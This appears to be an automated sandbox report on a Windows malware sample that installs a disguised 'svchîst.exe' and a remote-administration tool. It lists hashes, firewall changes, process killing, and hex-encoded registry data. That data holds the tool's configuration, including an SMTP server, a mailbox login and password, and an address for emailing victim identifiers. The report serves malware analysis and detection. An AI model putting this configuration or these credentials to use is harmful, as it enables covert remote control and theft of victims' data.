SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

Analysis: behavioral2

Detonation Overview

Submitted

2022-05-08 04:10

Reported

2022-05-08 05:59

Platform

win10v2004-20220414-en

Max time kernel

184s

Max time network

193s

Command Line

"C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe"

Signatures

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\drivers\install.exe C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\ssleay32.dll C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\libeay32.dll C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\svchîst.exe C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\svchîst.exe C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\attrib.exe N/A

Modifies Windows Firewall

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\drivers\install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\drivers\svchîst.exe N/A

Checks installed software on the system

discovery

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\idfgvgjnghcdfb.reg C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\idfgvgjnghcdfb.reg C:\Windows\SysWOW64\attrib.exe N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\install.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\ C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\drivers\install.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\install.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a C:\Windows\SysWOW64\drivers\install.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
